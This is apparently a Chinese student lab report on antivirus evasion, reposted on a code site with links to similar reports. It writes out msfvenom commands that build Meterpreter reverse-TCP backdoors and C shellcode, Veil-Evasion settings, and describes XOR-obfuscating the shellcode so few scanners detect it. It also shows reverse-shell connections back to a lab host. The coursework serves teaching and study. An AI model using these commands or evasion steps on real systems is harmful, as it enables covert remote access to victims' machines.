正文 

当前位置: 首页 > 代码 > java教程

20155320exp3免杀原理与实践(代码片段)

20155320罗佳琪 20155320罗佳琪     2022-11-01     438

关键词:

20155320 Exp3 免杀原理与实践

  • 免杀

一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。

【基础问题回答】

  • (1)杀软是如何检测出恶意代码的?

    1.通过行为检测

    2.通过特征码的比对

    3.启发式检测

  • (2)免杀是做什么?

    是对恶意软件做处理,用来躲避杀毒软件的检查

  • (3)免杀的基本方法有哪些?

    方法有修改特征码

    改变行为特征

【正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧】

在老师提供的virscan上上传后门进行免杀测试。

1.全裸后门测试

  • 将未经处理过的后门直接在virscan上测试,发现裸奔的后门有18个杀软检测到了。

2.利用msfvenom对裸奔的后门进行编码处理

  • 对全裸的后门用如下命令,进行一次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -b ‘\\x00’ LHOST=192.168.19.128 LPORT=5320 -f exe > 5320-v1.exe

  • 然后将经过编码后的后门程序后门程序在virscan上进行免杀测试,发现有19个杀软检测到了它,并没有起到隐藏作用。

  • 然后我不死心又尝试了10次编码,只用把命令中i后面的数字改一下,就能控制编码次数了。

  • 然而对于杀软来说穿上10件衣服的它和裸奔的它并没有什么区别,他依然没能逃过杀软的眼睛。

3.Veil-Evasion免杀平台

  • 由于用的是老师的虚拟机,所以Veil已经安装好了,直接输入veil进入免杀平台,之后依次输入以下命令来进行选择
use evasion
use python/meterpreter/rev_tcp.py
set LHOST 192.168.19.133(kali IP)
set LPORT 5320

  • 设定完成后,输入generate出现了错误,很难受,文件生成不了

  • 之后我看了一下有很多同学出现了同样的错误,发现将语言换成C语言即可了。

  • 将产生的后门复制到windows下,加入杀软的信任列表里,进行检测,发现这次隐藏得不错,只有9个杀软检测到了。

  • 通过回连(方法见上一次实验),成功监听

4.利用shellcode编程实现免杀

  • 利用msf命令生成一个C语言的shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.128.19.133 LPORT=5320 -f c

  • 将上图中生成的数组加上一个主函数建立一个met_5320.c的.c文件
  • 随后用命令i686-w64-mingw32-g++ met_5320.c -o met_5320.exe将.c文件转换为可执行文件met_5320.exe。

  • 可以将可执行文件复制到windows下可以检测一下它的隐蔽性,然而一复制就被我的电脑管家拦截了,授予信任后检测发现仍然有9个杀软检测到了它。

  • 回连但是exe文件运行有问题,很难受。

通过C语言调用Shellcode

  • 将shellcode拷到windows下,按老师的方法编写成.C文件通过VS编译运行得到的exe,可以回连到kali,报毒率也还可以,但是并没有低多少TAT。

手工版后门

  • 怎么能使报毒率变得更低呢,总的来说就是要将shellcode通过某种方式给藏起来,但是又能还原,发现大家的方法都五花八门的,我最终决定结合密码学的方法,将shellcode数组与1异或一下,主要是觉得应该隐藏效果不错而且简单。数组变化的代码如下。

  • 变化后的数组如下,而且我检测了一下再异或一下是能变回去的,而且目测还是变得挺面目全非的,放心啦~。

  • 将变化后的shellcode放入原C文件中,稍加变化(由于不让放代码,就不贴了),能回连成功,报毒率也相当低,只有2%了,开心,一直在报毒的瑞星也没发现,哈哈哈,用我的电脑管家查杀也很平静,感觉电脑管家保护不了我的电脑了。

【实验总结】

这次实验感觉相较有趣,技术性变强了,尤其是需要自己家手工制作后门实现免杀,感觉很有成就感,就是自己做后门的通用性不强,唉。还有就是发现瑞星很强呀,考虑之后换个杀软就换它了。

20165306exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践一、实践内容概述1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程2.通过组合应用各种技术实现恶意代码免杀3.用另一电脑实测,在杀软开启的情况下,可运行并回... 查看详情

20165218《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用VirusTotal或Viscan网站扫描后门程序VirusTotalViscan免杀工具1——msfvenom使用编码器-使用msfvenom命... 查看详情

exp3免杀原理与实践20154301仉鑫烨(代码片段)

20154301Exp3免杀原理与实践仉鑫烨一、实践内容正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;通过组合应用各种技术实现恶意代码免杀;用另一电脑实测,在杀软开启的情... 查看详情

20155330《网络攻防》exp3免杀原理与实践(代码片段)

20155330《网络攻防》Exp3免杀原理与实践基础问题回答杀软是如何检测出恶意代码的?基于特征码。先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码。基于行为。杀软通过检... 查看详情

20154307《网络对抗》exp3免杀原理与实践(代码片段)

20154307《网络对抗》Exp3免杀原理与实践一、基础问题回答(1)杀软是如何检测出恶意代码的?基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。启发式恶意软件... 查看详情

2017-2018-2《网络对抗技术》20155322exp3免杀原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322Exp3免杀原理与实践[-=博客目录=-]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-正确使用msf编码器2.2-veil-evasion2.3-组合应用技术实现免杀2.4-靶机实测2.5-基础问题回答3-资料1-实践目... 查看详情

20155236范晨歌_exp3免杀原理与实践(代码片段)

20155236范晨歌_免杀原理与实践免杀概述免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写VirusAV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。被谁杀?当然是被杀毒软件(引擎)... 查看详情

2018-2019-220165114《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践目录一、实验内容二、基础问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?三、实践过程记录正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用... 查看详情

exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课。另一方面我也想看看metasploit在这场猫鼠游戏中能不能走在安全厂商的前面。这次的目标免杀平台是64位windows7SP1,我用... 查看详情

20155202张旭exp3免杀原理与实践(代码片段)

20155202张旭Exp3免杀原理与实践AV厂商检测恶意软件的方式主流的就三种:基于特征码的检测启发式恶意软件检测基于行为的恶意软件检测我们要做的就是让我们的恶意软件没法被这三种方式找到,也就是免杀。具体的手段有:改... 查看详情

exp3免杀原理与实践——20164316张子遥(代码片段)

...用shellcode编程(2)通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电... 查看详情

20155232《网络对抗》exp3免杀原理与实践(代码片段)

20155232《网络对抗》Exp3免杀原理与实践问题回答1.基础问题回答(1)杀软是如何检测出恶意代码的?基于特征码的检测特征码:一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据... 查看详情

2018~2019-420165107网络对抗技术exp3免杀原理与实践(代码片段)

20165107Exp3免杀原理与实践实验要求1、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧2、通过组合应用各种技术实现恶意代码免杀3、用另一电脑实测,在杀软开... 查看详情

2018-2019-220165313exp3免杀原理与实践(代码片段)

...如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)1.2通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)1.3用... 查看详情

exp3免杀原理与实践20164314郭浏聿(代码片段)

...用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀(0.5分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,... 查看详情

2018-2019-220165205网络攻防exp3免杀原理与实践(代码片段)

2018-2019-220165205网络攻防Exp3免杀原理与实践一、实践内容1.1正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程1.1.1正确使用msf编码器尝试用msf编码器对后门程序进行多次编码,尝试降低被... 查看详情

exp3免杀原理与实践20164309(代码片段)

...如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧1.1MSF编码器直接使用上次实验的20164309_backdoor.exe试试看来文件名违法了,那改名为164309_backdoor。改名后直接被清理。。看来裸奔的后门的确不好使。 找... 查看详情

exp3免杀原理与实践(代码片段)

一、基础问题回答(1)杀软是如何检测出恶意代码的?       ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件。  &nb... 查看详情